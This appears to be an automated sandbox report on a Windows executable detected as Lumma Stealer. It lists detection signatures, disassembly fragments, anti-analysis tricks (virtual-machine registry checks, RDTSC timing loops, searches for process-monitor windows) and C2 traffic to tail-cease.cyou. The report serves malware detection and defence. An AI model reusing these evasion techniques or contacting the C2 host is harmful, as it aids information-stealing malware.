Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1561211
MD5: 8d5f9df92d2fb9c40125d06c7e3c66be
SHA1: 0e90f85e420a9231cefbf51d9cf6f9dddfb42aa7
SHA256: 32ffca83244f63bde5db2ae85aa691a68a2725199ffc4abbcbdab29b9fda8707
Tags: exe, user-Bitsight

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Suricata IDS alerts for network traffic
AI detected suspicious sample
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7044 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 8D5F9DF92D2FB9C40125D06C7E3C66BE)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-22T22:39:00.940600+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 104.21.93.105 | 443 | TCP
2024-11-22T22:39:03.182137+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 104.21.93.105 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-22T22:39:01.897959+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.93.105 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-22T22:39:01.897959+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 104.21.93.105 | 443 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [eax], bl | 0_2_0014CF05
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov ecx, eax | 0_2_0014C02B
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh | 0_2_0017C040
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], C18BC4BAh | 0_2_0017C040
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 6DBC3610h | 0_2_0017C040
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh | 0_2_0017C040
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [ebx], al | 0_2_00160870
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then push eax | 0_2_0017B860
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then push eax | 0_2_0017F8D0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edi, eax | 0_2_0017F8D0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h] | 0_2_0014E0D8
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+14h] | 0_2_001498F0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, eax | 0_2_0017B8E0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, ecx | 0_2_0017B8E0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edi, byte ptr [esp+edx+14h] | 0_2_0014E970
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [esi], cx | 0_2_0014EA38
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-65h] | 0_2_0014E35B
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov eax, ebp | 0_2_00145C90
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov eax, ebp | 0_2_00145C90
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov edx, ecx | 0_2_0014BC9D
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov byte ptr [esi], cl | 0_2_00168CB0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h | 0_2_0017BCE0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx] | 0_2_0014AD00
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [edi] | 0_2_00165E90
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax-58FA0F6Ch] | 0_2_00180F60
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h] | 0_2_001477D0
Source: C:\Users\user\Desktop\file.exe | Code function: 4x nop then mov word ptr [ebp+ebx*4+00h], ax | 0_2_001477D0

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.93.105:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.93.105:443
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.93.105:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.93.105:443
Source: global traffic | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: tail-cease.cyou
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: tail-cease.cyou
Source: unknown | HTTP traffic detected:
    POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: tail-cease.cyou
Source: file.exe, 00000000.00000002.1743661055.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742717904.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tail-cease.cyou/
Source: file.exe, 00000000.00000003.1742300907.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742626357.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743661055.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742717904.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743661055.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743519317.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742717904.0000000000BFA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tail-cease.cyou/api
Source: file.exe, 00000000.00000002.1743661055.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742717904.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tail-cease.cyou/b
Source: file.exe, 00000000.00000002.1743661055.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1742717904.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tail-cease.cyou/d
Source: file.exe, 00000000.00000003.1742300907.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1743519317.0000000000B83000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://tail-cease.cyou:443/apia/
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | HTTPS traffic detected: 104.21.93.105:443 -> 192.168.2.4:49730 version: TLS 1.2

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00179030
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001489A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0014CF05
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00248825
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00146840
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0017C040
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00160870
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002138A9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0017F8D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0014E0D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003130EC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001498F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0017B8E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003180C9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0014E970
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002BA942
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0030A99C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001461A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001741D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0031D1EF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00149210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0014B210
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00260A41
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00144AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00145AC9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0015DB30
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0030FB01
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00319B6B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0015FB60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00142B80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0031EC27
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0014542C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002DCC17
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002C8467
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00145C90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00180C80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00168CB0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00307C9C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001494D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00146CC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001724E0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0014AD00
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00159530
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00163D70
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00143580
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00181580
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00167E20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00160650
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00316678
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00165E90
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0030DEEB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00322ED7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002C6ECB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001AAF0E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00168770
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00180F60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00161790
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0017C780
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001787B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002DB797
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001477D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001427D0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: ZLIB complexity 0.9991995389344263
Source: file.exe | Static PE information: Section: jobzmdtd ZLIB complexity 0.9945954464550578
Source: classification engine | Classification label: mal100.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001727B0 CoCreateInstance,
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: webio.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: file.exe | Static file information: File size 1897984 > 1048576
Source: file.exe | Static PE information: Raw size of jobzmdtd is bigger than: 0x100000 < 0x1a5600

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.140000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jobzmdtd:EW;izjuqqoh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jobzmdtd:EW;izjuqqoh:EW;.taggant:EW;
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1d0a2b should be: 0x1d983c
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: jobzmdtd
Source: file.exe | Static PE information: section name: izjuqqoh
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00248825 push edi; mov dword ptr [esp], 0B9C1352h | 0_2_0024885B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00248825 push ebp; mov dword ptr [esp], 55457955h | 0_2_00248884
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00248825 push eax; mov dword ptr [esp], 0A16D3D5h | 0_2_002488A2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00248825 push 310D8D53h; mov dword ptr [esp], edi | 0_2_002488EF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00248825 push 0ACAE305h; mov dword ptr [esp], edi | 0_2_00248964
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00248825 push 553FABF6h; mov dword ptr [esp], eax | 0_2_002489B2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00248825 push 73B1DA0Bh; mov dword ptr [esp], eax | 0_2_00248A08
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00248825 push edi; mov dword ptr [esp], ecx | 0_2_00248A23
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003D5826 push 2E0EBA84h; mov dword ptr [esp], ebx | 0_2_003D5967
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0039D01E push ebp; mov dword ptr [esp], edx | 0_2_0039D064
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0039D01E push 11578C51h; mov dword ptr [esp], ebx | 0_2_0039D0D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00396015 push 656A7BFAh; mov dword ptr [esp], ebp | 0_2_00396040
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0032681C push esi; mov dword ptr [esp], edx | 0_2_00326841
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0032681C push esi; mov dword ptr [esp], esp | 0_2_00326845
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00158028 push esp; ret | 0_2_0015802B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00155057 push eax; iretd | 0_2_00155058
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C7878 push 26E8A99Eh; mov dword ptr [esp], ebp | 0_2_003C78C1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00376063 push ebx; mov dword ptr [esp], edi | 0_2_00376067
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003CF053 push ebx; mov dword ptr [esp], ebp | 0_2_003CF070
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003EF0BB push 719DCBC3h; mov dword ptr [esp], edx | 0_2_003EF0E4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003EF0BB push 13267B02h; mov dword ptr [esp], edi | 0_2_003EF101
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002138A9 push 5D41F02Dh; mov dword ptr [esp], ebp | 0_2_002138C7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002138A9 push 6770AB66h; mov dword ptr [esp], ebp | 0_2_002138E3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002138A9 push 206817A2h; mov dword ptr [esp], esi | 0_2_00213901
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_002138A9 push eax; mov dword ptr [esp], edx | 0_2_00213980
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003BE0A5 push 32211F65h; mov dword ptr [esp], edi | 0_2_003BE0F9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003B1097 push 3C122AC2h; mov dword ptr [esp], eax | 0_2_003B10D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038F0EE push eax; mov dword ptr [esp], ebp | 0_2_0038F161
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003130EC push esi; mov dword ptr [esp], edi | 0_2_0031312A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003130EC push ecx; mov dword ptr [esp], ebx | 0_2_0031312E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003130EC push eax; mov dword ptr [esp], edx | 0_2_0031314D
Source: file.exe | Static PE information: section name: entropy: 7.97509167370507
Source: file.exe | Static PE information: section name: jobzmdtd entropy: 7.954231338425638

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 19D099 second address: 19D09F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 19D09F second address: 19D0A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 32633E second address: 326346 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 3268A9 second address: 3268D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F27492B5210h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F27492B5216h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 326A3B second address: 326A41 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 326A41 second address: 326A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F27492B5219h 0x0000000e jmp 00007F27492B5210h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 326A73 second address: 326A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 326A79 second address: 326A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 326A7D second address: 326A83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 32A04C second address: 32A051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 32A166 second address: 32A189 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F2749204C34h 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 32A189 second address: 32A18E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 32A18E second address: 32A1DF instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2749204C3Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c jns 00007F2749204C30h 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 jmp 00007F2749204C39h 0x0000001e pop eax 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 32A2E6 second address: 32A2EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 32A2EA second address: 32A2F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 32A2F0 second address: 32A32C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007F27492B5206h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jg 00007F27492B5221h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 jp 00007F27492B520Eh 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 32A32C second address: 32A3E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop eax 0x00000006 js 00007F2749204C2Fh 0x0000000c je 00007F2749204C29h 0x00000012 movzx esi, cx 0x00000015 push 00000003h 0x00000017 jmp 00007F2749204C2Dh 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F2749204C28h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 mov edx, esi 0x0000003a push 00000003h 0x0000003c jp 00007F2749204C26h 0x00000042 push 6F283D06h 0x00000047 jmp 00007F2749204C30h 0x0000004c add dword ptr [esp], 50D7C2FAh 0x00000053 call 00007F2749204C39h 0x00000058 call 00007F2749204C2Fh 0x0000005d pop edi 0x0000005e pop edi 0x0000005f jmp 00007F2749204C2Ch 0x00000064 lea ebx, dword ptr [ebp+12460F3Ch] 0x0000006a mov dword ptr [ebp+122D1C09h], esi 0x00000070 xchg eax, ebx 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 pushad 0x00000075 popad 0x00000076 js 00007F2749204C26h 0x0000007c popad 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 32A443 second address: 32A456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F27492B5206h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jne 00007F27492B5206h 0x00000013 rdtsc
